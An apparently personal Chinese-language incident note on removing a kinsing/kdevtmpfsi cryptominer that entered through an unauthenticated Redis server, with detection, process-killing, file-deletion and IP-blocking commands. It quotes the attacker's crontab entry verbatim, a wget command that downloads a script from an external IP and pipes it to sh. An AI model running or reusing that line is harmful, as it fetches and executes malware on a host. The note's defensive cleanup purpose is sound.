起因:redis配置不安全导致
参考文章:
https://help.aliyun.com/knowledge_detail/37447.html?spm=a2c4g.11186631.2.2.828c1848kuRv6p
1.漏洞描述
Redis 因配置不当存在未授权访问漏洞(就是开放外网端口且没加密码),可以被攻击者恶意利用。
在特定条件下,如果 Redis 以 root 身份运行,黑客可以给 root 账号写入 SSH 公钥文件,直接通过 SSH 登录受害服务器,从而获取服务器权限和数据。一旦入侵成功,攻击者可直接添加账号用于 SSH 远程登录控制服务器,给用户的 Redis 运行环境以及 Linux 主机带来安全风险,如删除、泄露或加密重要数据,引发勒索事件等。
2.受影响范围
在 Redis 客户端,尝试无账号登录 Redis:
root@kali:~# redis-cli -h 10.16.10.2
redis 10.16.10.2:6379> keys *
- “1”`
从登录结果可以看出,该 Redis 服务对公网开放,且未启用认证。
与病毒斗争
参考文章:
https://www.cnblogs.com/llody/p/12133372.html
1、# top
查看cpu占用情况,找到占用cpu的进程 最后是 kdevtmpfsi
2、# netstat -natp
根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了
3、crontab -l
此时,挖矿脚本大概率定时在你的crontab里面。
发现异常定时任务,* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1 立刻删除
4、kill进程
ps -aux | grep kinsing
ps -aux | grep kdevtmpfsi
Kill - 9 pid
5、删文件
cd /tmp
ls
rm -rf kdevtmpfsi
rm -rf /var/tmp/kinsing 记得这个守护进程的文件也要删掉,找不到的话,也可以用这个命令
find / -name kdevtmpfsi
find / -name kinsing
查看是否有相关的木马定时任务在执行 有的话删掉再重启下crontab
Cd /var/spool/cron
由于直接是redis引起的,病毒文件多半是在redis文件夹里,全删掉!
在此长个记性,软件安装一定要单独分出文件夹,要不不知道从哪删除。
6、封禁ip
在tcpd服务器配置中封禁
Vi /etc/hosts.deny
删除最后一行
改成如下内容
在防火墙禁止ip访问
封禁IP:
iptables -I INPUT -s 195.3.146.118 -j DROP
直接服务配置nginx.conf
封禁单个IP
deny 195.3.146.118;
#封整个段即从123.0.0.1到123.255.255.254的命令
deny 123.0.0.0/8
#封IP段即从123.45.0.1到123.45.255.254的命令
deny 124.45.0.0/16
#封IP段即从123.45.6.1到123.45.6.254的命令是
deny 123.45.6.0/24
重启nginx 服务 ./nginx -s reload